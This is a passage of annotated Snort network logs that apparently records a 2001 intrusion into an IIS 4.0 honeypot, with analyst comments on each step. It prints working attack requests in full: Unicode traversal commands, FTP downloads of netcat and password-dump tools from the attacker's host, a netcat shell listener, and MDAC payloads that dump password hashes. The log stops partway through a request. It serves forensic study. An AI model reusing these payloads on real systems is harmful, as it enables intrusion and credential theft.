TCP TTL:127 TOS:0x0 ID:377 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBDE907 Ack: 0x9D8533D5 Win: 0x20E8 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:55 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The purpose of the script is the same as before.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:10.544150 213.116.251.162:1882 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11847 IpLen:20 DgmLen:365 DF
***AP*** Seq: 0x9DACA7DA Ack: 0x2CBE10F7 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1.
.Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, def
late..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Aliv
e....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:10.583546 172.16.1.106:80 -> 213.116.251.162:1882
TCP TTL:127 TOS:0x0 ID:1913 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBE10F7 Ack: 0x9DACA91F Win: 0x20F3 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:41:06 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to kick off the FTP script
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:21.001718 213.116.251.162:1885 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11861 IpLen:20 DgmLen:360 DF
***AP*** Seq: 0x9DD68A8F Ack: 0x2CBE39CF Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1..Acce
pt: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate.
.User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0;
Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:22.623716 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11869 IpLen:20 DgmLen:90 DF
***AP*** Seq: 0x9DDB0EF4 Ack: 0x2CBE3D0D Win: 0x2238 TcpLen: 20
220-Serv-U FTP-Server v2.5h for WinSock ready.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.271644 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11871 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x9DDB0F26 Ack: 0x2CBE3D0D Win: 0x2238 TcpLen: 20
220--------H-A-C-K T-H-E P-L-A-N-E-T--------..220-W3|_c0m3 T0
JohnA's 0d4y Ef-Tee-Pee S3rv3r...220-Featuring 100% elite hax0r
warez!@$#@..220-Im running win 95 (Release candidate 1), on a p3
3, with 16mb Ram...220 -------H-A-C-K T-H-E P-L-A-N-E-T-------
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.295141 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4217 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x2CBE3D0D Ack: 0x9DDB1029 Win: 0x2103 TcpLen: 20
USER johna2k ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.671412 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11872 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x9DDB1029 Ack: 0x2CBE3D1C Win: 0x2229 TcpLen: 20
331 User name okay, need password...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.676158 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4729 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x2CBE3D1C Ack: 0x9DDB104D Win: 0x20DF TcpLen: 20
PASS haxedj00..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# And this time it works
[**] FTP control channel [**]
02/04-05:42:24.138966 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11874 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB104D Ack: 0x2CBE3D2B Win: 0x221A TcpLen: 20
230 User logged in, proceed...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.147396 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4985 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D2B Ack: 0x9DDB106B Win: 0x20C1 TcpLen: 20
PORT 172,16,1,106,12,71..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.517966 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11875 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB106B Ack: 0x2CBE3D44 Win: 0x2200 TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.522065 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:5241 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBE3D44 Ack: 0x9DDB1089 Win: 0x20A3 TcpLen: 20
RETR nc.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.981244 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11877 IpLen:20 DgmLen:106 DF
***AP*** Seq: 0x9DDB1089 Ack: 0x2CBE3D51 Win: 0x21F3 TcpLen: 20
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.518867 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11925 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB10CB Ack: 0x2CBE3D51 Win: 0x21F3 TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.542160 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:16249 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D51 Ack: 0x9DDB10E3 Win: 0x2049 TcpLen: 20
PORT 172,16,1,106,12,72..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.895562 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11927 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB10E3 Ack: 0x2CBE3D6A Win: 0x21D9 TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.899645 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:16505 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CBE3D6A Ack: 0x9DDB1101 Win: 0x202B TcpLen: 20
RETR pdump.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:38.303599 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11929 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0x9DDB1101 Ack: 0x2CBE3D7A Win: 0x21C9 TcpLen: 20
150 Opening ASCII mode data connection for pdump.exe (32768 byte
s)...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# As soon as netcat is downloaded (but before other files complete), intruder Uses Unicode vulnerability
!@# to open an instance of netcat listening on port 6969 using the -e flag to pipe input to cmd1.exe
!@# The intruder would need to run a command something like 'nc 172.16.1.106 6969' on their end
!@# NOTE: this instance of cmd1.exe will be running with the same priviledges as the web server.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:42.787971 213.116.251.162:1887 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11951 IpLen:20 DgmLen:372 DF
***AP*** Seq: 0x9E2701A1 Ack: 0x2CBE8B7D Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HT
TP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gz
ip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Win
dows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Ke
ep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.346161 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11967 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB1146 Ack: 0x2CBE3D7A Win: 0x21C9 TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.360871 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:23417 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D7A Ack: 0x9DDB115E Win: 0x1FCE TcpLen: 20
PORT 172,16,1,106,12,73..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.795847 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11973 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB115E Ack: 0x2CBE3D93 Win: 0x21AF TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.800036 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:23673 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0x2CBE3D93 Ack: 0x9DDB117C Win: 0x1FB0 TcpLen: 20
RETR samdump.dll..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:47.228807 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11975 IpLen:20 DgmLen:111 DF
***AP*** Seq: 0x9DDB117C Ack: 0x2CBE3DA5 Win: 0x219D TcpLen: 20
150 Opening ASCII mode data connection for samdump.dll (36864 by
tes)...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Intruder gets a remote console 'C:\Program Files\Common Files\system\msadc>'
[**] netcat session 6969 [**]
02/04-05:42:49.263766 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25465 IpLen:20 DgmLen:155 DF
***AP*** Seq: 0x2CBEA4C2 Ack: 0x9E43FB19 Win: 0x2238 TcpLen: 20
Microsoft(R) Windows NT(TM)..(C) Copyright 1985-1996 Microsoft C
orp.....C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:55.236504 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:12008 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB11C3 Ack: 0x2CBE3DA5 Win: 0x219D TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:55.244260 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:31097 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CBE3DA5 Ack: 0x9DDB11DB Win: 0x1F51 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP session ends '221 Buh bye, you secksi hax0r j00 :]'
[**] FTP control channel [**]
02/04-05:42:55.628742 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:12010 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x9DDB11DB Ack: 0x2CBE3DAB Win: 0x2197 TcpLen: 20
221 Buh bye, you secksi hax0r j00 :]..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:55.648760 172.16.1.106:80 -> 213.116.251.162:1885
TCP TTL:127 TOS:0x0 ID:31609 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBE39CF Ack: 0x9DD68BCF Win: 0x20F8 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:41:51 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:31.075053 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34169 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEA535 Ack: 0x9E43FB1E Win: 0x2233 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:31.655576 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34425 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEA5FD Ack: 0x9E43FB1E Win: 0x2233 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to execute pdump and append output to file 'yay.txt'. This will give him/her the password hashes for a cracking tool later.
!@# NOTE: Commands run using the MDAC vulnerability will execute with system priviledges
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:43:52.580779 213.116.251.162:1891 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12037 IpLen:20 DgmLen:831 DF
***AP*** Seq: 0x9F3A4F1C Ack: 0x2CBF9EC4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 637..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 428..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .C
.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.s.y.s
.t.e.m.\.m.s.a.d.c.\.p.d.u.m.p...e.x.e. .>.>.y.a.y...t.x.t.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to get a dir listing but yay.txt is not there.
[**] netcat session 6969 [**]
02/04-05:43:56.131774 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38009 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEA994 Ack: 0x9E43FB23 Win: 0x222E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:56.681806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38265 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEAA5C Ack: 0x9E43FB23 Win: 0x222E TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:03.242174 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39289 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBEADF3 Ack: 0x9E43FB2B Win: 0x2226 TcpLen: 20
.[Adir..The name specified is not recognized as an..internal or
external command, operable program or batch file.....C:\Program
Files\Common Files\system\msadc>..C:\Program Files\Common Files\
system\ms
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:03.806627 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39545 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBEAEBC Ack: 0x9E43FB2B Win: 0x2226 TcpLen: 20
adc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:05.245136 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40057 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEAEC0 Ack: 0x9E43FB30 Win: 0x2221 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries dir again, yay.txt still not there.
[**] netcat session 6969 [**]
02/04-05:44:05.810066 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40313 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEAF88 Ack: 0x9E43FB30 Win: 0x2221 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# deletes ftp script 'ftpcom' using remote shell. Cleanup.
[**] netcat session 6969 [**]
02/04-05:44:10.752997 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:41593 IpLen:20 DgmLen:142 DF
***AP*** Seq: 0x2CBEB31F Ack: 0x9E43FB3C Win: 0x2215 TcpLen: 20
del ftpcom....C:\Program Files\Common Files\system\msadc>..C:\Pr
ogram Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# tries to run 'ls' from remote shell. Sorry, this is NT
[**] netcat session 6969 [**]
02/04-05:44:13.557283 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42617 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBEB385 Ack: 0x9E43FB43 Win: 0x220E TcpLen: 20
ls...The name specified is not recognized as an..internal or ext
ernal command, operable program or batch file.....C:\Program Fil
es\Common Files\system\msadc>..C:\Program Files\Common Files\sys
tem\msadc
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:13.908806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42873 IpLen:20 DgmLen:41 DF
***AP*** Seq: 0x2CBEB44E Ack: 0x9E43FB46 Win: 0x220B TcpLen: 20
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs dir from remote shell. ftpcom is gone.
[**] netcat session 6969 [**]
02/04-05:44:14.406569 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43129 IpLen:20 DgmLen:1112 DF
***AP*** Seq: 0x2CBEB44F Ack: 0x9E43FB46 Win: 0x220B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:43a ...02/04/01 06:
43a ....09/25/97 07:41a
596 adcjavas.inc..09/25/97 07:41a 589 adcvbs
.inc..04/30/97 11:00p 208,144 cmd1.exe..09/25/97
08:28a 172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23
,312 msadcf.dll..09/25/97 08:24a 91,408 msadco.d
ll..09/25/97 08:19a 5,120 msadcor.dll..09/26/97
08:19a 42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..02/04/01 06:41a 32,768
pdump.exe..10/02/97 07:28a 19,388 readme.txt..0
2/04/01 06:41a 36,864 samdump.dll..
15 File(s) 698,285 bytes.. 1,69
0,861,056 bytes free....C:\Program Files\Common Files\system\msa
dc>..C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to read 'readme.txt' file using 'type' command from his remote shell. Mistypes filename and doesn't try again.
[**] netcat session 6969 [**]
02/04-05:44:20.267054 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45689 IpLen:20 DgmLen:189 DF
***AP*** Seq: 0x2CBEB87F Ack: 0x9E43FB55 Win: 0x21FC TcpLen: 20
type readme.e..The system cannot find the file specified.....C:\
Program Files\Common Files\system\msadc>..C:\Program Files\Commo
n Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run pdump again and redirect output to file 'c:\yay.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:44:36.999012 213.116.251.162:1893 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12085 IpLen:20 DgmLen:839 DF
***AP*** Seq: 0x9FE5422E Ack: 0x2CC04C74 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 645..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 436..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
